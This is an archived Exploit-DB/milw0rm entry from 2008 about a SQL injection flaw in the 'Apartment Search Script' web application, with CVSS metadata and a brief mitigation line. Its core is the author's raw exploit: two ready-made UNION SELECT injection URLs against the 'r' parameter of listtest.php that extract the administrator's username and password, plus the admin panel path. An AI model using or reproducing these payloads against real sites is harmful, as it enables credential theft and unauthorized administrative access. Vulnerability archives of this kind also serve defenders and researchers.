Apartment Search Script SQL Injection Vulnerability

vendor:

Apartment Search Script

by:

Crackers_Child

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Apartment Search Script

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Apartment Search Script SQL Injection Vulnerability

A SQL injection vulnerability exists in Apartment Search Script, which allows an attacker to execute arbitrary SQL commands via the 'r' parameter in listtest.php. An attacker can exploit this vulnerability to gain access to the admin panel by using the username and password exploit strings provided. The admin panel is located at /Site_Admin/.

Mitigation:

Input validation should be used to prevent SQL injection attacks.

Source

Exploit-DB raw data:

$ Script        : Apartment Search Script SQL Injection Vulnerability

$ Script Info   : http://www.yourfreeworld.com/script/apartment.asp

$ Script Price  : Only $79

$ Demo          : http://www.downlinegoldmine.com/apartment/

$ Author        : Crackers_Child

$ Contact       : cashr00t@hotmail.com

$ Note          : Erbabi ile vurulduysak sirtimizdan neyleyelim.Bir Yarali Kurt Misali

$ Note          : Her Yanimiz it Tuzagi . . .

$ Username Exp  : www.x.com/script_path/listtest.php?r=-1/**/union/**/select/**/1,admin%20from%20site_admin/*

$ Password Exp  : www.x.com/script_path/listtest.php?r=-1/**/union/**/select/**/1,password%20from%20site_admin/*

$ Admin Login   : /Site_Admin/ 

$ Greetz        : Milw0rm.Com & All Peace Warriors

# milw0rm.com [2008-04-19]